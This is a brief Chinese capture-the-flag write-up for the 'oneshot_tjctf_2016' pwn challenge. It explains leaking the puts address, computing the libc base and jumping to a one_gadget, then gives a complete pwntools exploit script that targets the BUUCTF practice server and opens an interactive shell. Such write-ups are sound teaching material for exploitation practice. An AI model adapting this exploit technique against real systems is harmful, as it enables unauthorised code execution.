只开了栈不可执行
泄露地址,然后再跳回去,最后跳到onegadget的位置
from pwn import*from LibcSearcher import*context.log_level='debug'#io = process('./oneshot_tjctf_2016')io = remote('node4.buuoj.cn',26454)libc =ELF("libc-2.23.so")#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')elf = ELF('./oneshot_tjctf_2016')payload =str(6294232)io.recvuntil("Read location?")io.sendline(payload)io.recvuntil("0x0000")puts_addr = int(io.recvuntil("\n")[:-1],16)log.success("puts_addr:"+hex(puts_addr))io.recvuntil("Jump location?")io.sendline(str(4195910))io.recvuntil("Read location?")io.sendline(payload)libcbase = puts_addr - libc.sym["puts"]onegadget = [0x45216,0x4526a,0xf02a4,0xf1147]payload = libcbase+onegadget[0]io.recvuntil("Jump location?")io.sendline(str(payload))io.interactive()
若有收获,就点个赞吧
0 人点赞
